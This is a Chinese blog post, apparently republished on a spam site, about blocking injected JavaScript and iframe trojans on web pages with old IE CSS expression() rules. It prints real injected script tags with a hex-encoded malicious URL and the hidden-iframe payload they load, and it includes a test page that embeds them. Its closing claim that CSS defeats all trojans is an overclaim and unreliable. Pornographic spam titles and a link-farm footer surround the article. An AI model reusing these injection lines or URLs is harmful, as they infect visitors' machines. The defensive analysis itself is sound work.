天天躁日日躁狠狠躁AV麻豆-天天躁人人躁人人躁狂躁-天天澡夜夜澡人人澡-天天影视香色欲综合网-国产成人女人在线视频观看-国产成人女人视频在线观看

二行代碼解決全部網(wǎng)頁木馬

 前不久一行代碼解決iframe掛馬(包含服務(wù)器端注入、客戶端ARP注入等)》得到了很多朋友的認可,這確實是個避避風雨的好辦法。可現(xiàn)在掛網(wǎng)馬的方式真如我所料地改變了,現(xiàn)在流行掛<script>木馬,汗了,看了幾個網(wǎng)友的網(wǎng)站都被這樣了――頁面的頂部或底部加上了:

注意,以下地址含有木馬,請不要輕易訪問:

<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
汗死,一連插入了N個一樣的<script>標記。偶的電腦什么補丁都打了,直接訪問這個http://%76%63%63%64%2E%63%6E(或直接使用迅雷下載),額~ 現(xiàn)形了:

document.write("<div style='display:none'>")
document.write("<iframe src=http://a.158dm.com/b1.htm?id=017 width=0 height=0></iframe>")
document.write("</div>")
又用迅雷下載http://a.158dm.com/b1.htm這個文件,一看,亂七八糟的JS編碼,汗,不過找到了一個類似QQ號的數(shù)字,直接加加看,汗,然后是專業(yè)提供網(wǎng)馬的組織,哎,什么世道。還收費蠻高滴呢!

...
var Kfqq, Qqs="[color=Magenta]784378237[/color]"; qwfgsg="LLLL//XXXXXLD"; Kfqq = Qqs;
(...略)(下面還有N個統(tǒng)計的JS代碼)
針對上面的情況,我也不能白白瞧著不管,想想辦法吧,兄弟。喝了碗綠豆粥,糖放得蠻多的,好喝。辦法想到了。稍微分析就得出了答案。大家來看看,<script>木馬的特點是什么:

<script src=http://%76%63%63%64%2E%63%6E></script>

對了,script木馬的src一般都是外域的,也就是src是以http打頭的,如果是自己網(wǎng)站的script一般都不用加上http;再看看木馬的原形,里面還是輸出的iframe、JS代碼或是其他<object>代碼,不管這么多,來多少殺多少。

來跟我寫CSS,一一搞定它們,我寫了5種不同的方案,大家來測試一下哈:

解決方案1:

復(fù)制代碼 代碼如下:
iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');}/*這行代碼是解決掛IFRAME木馬的哦*/ 
script{nojs1:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木馬被成功隔離!'):'');} 
原理:將<script>標記的src拿出來轉(zhuǎn)為小寫,再看是不是以“http”開頭的外域JS腳本文件,如果是,則頁面內(nèi)容清空并寫出“木馬被成功隔離!”。反之正常顯示。

缺點:訪客無法看到被感染了<script>木馬的頁面。

解決方案2:

復(fù)制代碼 代碼如下:
iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');} 
script{no2js:expression((this.src.toLowerCase().indexOf('http')==0)?document.close():'');} 

原理:將外域的JS文件的document.write()使用document.close()強制關(guān)閉。木馬內(nèi)容還沒有來得及寫完,只有部分被強制緩存輸出了,剩下的不會再寫了
解決方案3:

復(fù)制代碼 代碼如下:
iframe{ni3fm:expression(this.src='about:blank',this.outerHTML='');} 
script{n3ojs:expression((this.src.toLowerCase().indexOf('http')==0)?document.execCommand('stop'):'');} 

原理:同到外域的JS文件,立即調(diào)用IE私有的execCommand方法來停止頁面所有請求,所以接下來的外域JS文件也被強制停止下載了。就像我們點了瀏覽器的“停止”按鈕一樣。看來這是JS模擬IE停止按鈕的一種方法。

解決方案4:

復(fù)制代碼 代碼如下:
iframe{nif4m:expression(this.src='about:blank',this.outerHTML='');} 
script{noj4s:expression(if(this.src.indexOf('http')==0)this.src='res://ieframe.dll/dnserror.htm');} 

原理:將外域的JS文件的src重寫成本地IE404錯誤頁面的地址,這樣,外域的JS代碼不會下載。

解決方案5:

復(fù)制代碼 代碼如下:
iframe{nifm5:expression(this.src='about:blank',this.outerHTML='');} 
script{noj5s:expression((this.id.toLowerCase().indexOf('lh')==0)?document.write('木馬被成功隔離!'):''));} 

第五種方案的頁面HTML源代碼<script>中要加入以"lh"為前綴的id,如lhWeatherJSapi,<script src="***/**.js" id="lhSearchJSapi"></script> 

以下頁面代碼里含有一個木馬地址,而且木馬在頁面里重復(fù)了6次,大家分別用我上面的不同方案測試一下,看看我的研究如何!(此測試有一定的危險性,請務(wù)必打好所有補丁再測試)

復(fù)制代碼 代碼如下:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 
<html xmlns="http://www.w3.org/1999/xhtml"> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<title>讓JS木馬的進程迅速中止的CSS代碼</title> 
<style type="text/css" id="LinrStudio"> 
/*<![CDATA[*/ 
iframe{nhk1:expression(this.src='about:blank',this.outerHTML='');} 
script{ngz1:expression((this.src.indexOf('http')==0)?document.close():'');} 
/* 以后請在此關(guān)注最新木馬處理方法:http://www.nihaoku.cn/ff/api.htm */ 
/*]]>*/ 
</style> 
</head> 
<body> 
<script type="text/Javascript" src="1.js"></script> 
<script src=http://%76%63%63%64%2E%63%6E></script> 
<script src="http://%76%63%63%64%2E%63%6E" type="text/Javascript"></script> 
<script src=http://%76%63%63%64%2E%63%6E></script> 
我是頁面本身的1 
<script src=http://%76%63%63%64%2E%63%6E></script> 
我是頁面本身的2 
<script src=http://%76%63%63%64%2E%63%6E></script> 
我是頁面本身的3 
<script src=http://%76%63%63%64%2E%63%6E></script> 
</body> 
</html>  
其中1.js是自己本站的:

document.write("我是本站的JS文件");
document.write("<img src='http://www.baidu.com/images/logo.gif' />");
我的測試環(huán)境是:

Windows XP SP2 和windows Vista SP1
IE6/IE7/IE8
已全部打好補丁。

綜上所述,所有目前的掛馬方式全都破解了,用CSS就可以解決所有木馬問題,訪客不會再輕易地中毒了。

大家也要仔細研究一下,看看我的代碼有什么BUG,有的話一定要拿出來討論,好解決問題!或是各位有其他更好的辦法可以拿出來討論一下。

JavaScript技術(shù)二行代碼解決全部網(wǎng)頁木馬,轉(zhuǎn)載需保留來源!

鄭重聲明:本文版權(quán)歸原作者所有,轉(zhuǎn)載文章僅為傳播更多信息之目的,如作者信息標記有誤,請第一時間聯(lián)系我們修改或刪除,多謝。

主站蜘蛛池模板: 国产WW高清大片免费看 | 美女叉腿掰阴大胆艺术照 | 日韩亚洲欧美中文高清 | 中文字幕一区在线观看视频 | 久久国产精品永久免费网站 | 欧美精品色视频 | 久久精品天天中文字幕 | 97免费视频在线观看 | 欧美色图一区二区三区 | 国产99久久亚洲综合精品西瓜tv | 国产午夜亚洲精品理论片八戒 | 娇小萝被两个黑人用半米长 | 美女不要啊 | 麻豆精品传媒2021网站入口 | 色欲AV精品人妻一二三区 | 热99RE久久精品国产 | 美女被撕开胸罩狂揉大乳 | 国产精品午夜福利在线观看 | 午夜福到在线2019 | 美女扒开腿让男人桶个爽 | 啦啦啦 中文 中国 免费 高清在线 | 亚洲一区二区免费看 | 日韩丰满少妇无码内射 | 大香伊蕉在人线国产最新 | 秋霞网在线伦理免费 | 伊人影院综合 | 又大又硬又爽免费视频 | yellow片高清视频免费看 | 男女啪啪抽搐呻吟高潮动态图 | 天天色天天干天天 | 久久综合丁香激情久久 | 国产AV视频一区二区蜜桃 | 国产美女久久久久久久久久久 | 女人爽得直叫免费视频 | 亚洲狠狠网站色噜噜 | 538久久视频在线 | 果冻传媒妈妈要儿子 | 欧美四虎精品二区免费 | 日本孕妇大胆孕交 | 含羞草免费完整视频在线观看 | 男女久久久国产一区二区三区 |